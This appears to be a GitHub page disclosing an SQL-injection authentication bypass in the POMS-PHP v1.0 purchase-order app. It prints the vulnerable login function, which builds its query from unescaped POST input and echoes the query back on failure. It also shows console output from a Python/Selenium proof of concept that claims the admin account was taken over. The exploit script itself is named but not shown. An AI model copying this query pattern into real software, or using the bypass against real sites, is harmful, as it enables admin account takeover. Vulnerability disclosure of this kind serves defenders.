Skip to content
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 
 
 
 
 

CVE-nu11-09

Vendor

Vulnerability Description:

The POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote SQL-Injection-Bypass-Authentication for the admin account in app /purchase_order/classes/Login.php. remote SQL-Injection-Bypass-Authentication: https://portswigger.net/support/using-sql-injection-to-bypass-authentication. The parameter (username) from the login form is not protected correctly and there is no security and escaping from malicious payloads. When the user will sending a malicious query or malicious payload to the MySQL server, he can bypass the login credentials and take control of the admin account.

Vulnerability PHP code:

	public function login(){
		extract($_POST);

		$qry = $this->conn->query("SELECT * from users where username = '$username' and password = md5('$password') ");
		if($qry->num_rows > 0){
			foreach($qry->fetch_array() as $k => $v){
				if(!is_numeric($k) && $k != 'password'){
					$this->settings->set_userdata($k,$v);
				}

			}
			$this->settings->set_userdata('login_type',1);
		return json_encode(array('status'=>'success'));
		}else{
		return json_encode(array('status'=>'incorrect','last_qry'=>"SELECT * from users where username = '$username' and password = md5('$password') "));
		}
	}

Responding from the hacked target:

      • PoC + checks = PoC-CVE-nu11-09-rfth.py
C:\Users\venvaropt\Desktop\CVE-nu11-09-09092021>python PoC-CVE-nu11-09.py

DevTools listening on ws://127.0.0.1:63704/devtools/browser/bf18be59-2361-4c08-82dc-689957d5bf9e

The payload for CVE-nu11-09 is deployed and your admin account is PWNED by SQL - Injection

Please see the screenshot poc.png to see if your exploit is working =) BR @nu11secur1ty

This target gives a positive <Response [200]> from inside, after bypassing the login :D

C:\Users\venvaropt\Desktop\CVE-nu11-09-09092021>

Exploit technique:

Python + Selenium + hidden login && screenshot

Proof:

href

BR

      • @nu11secur1ty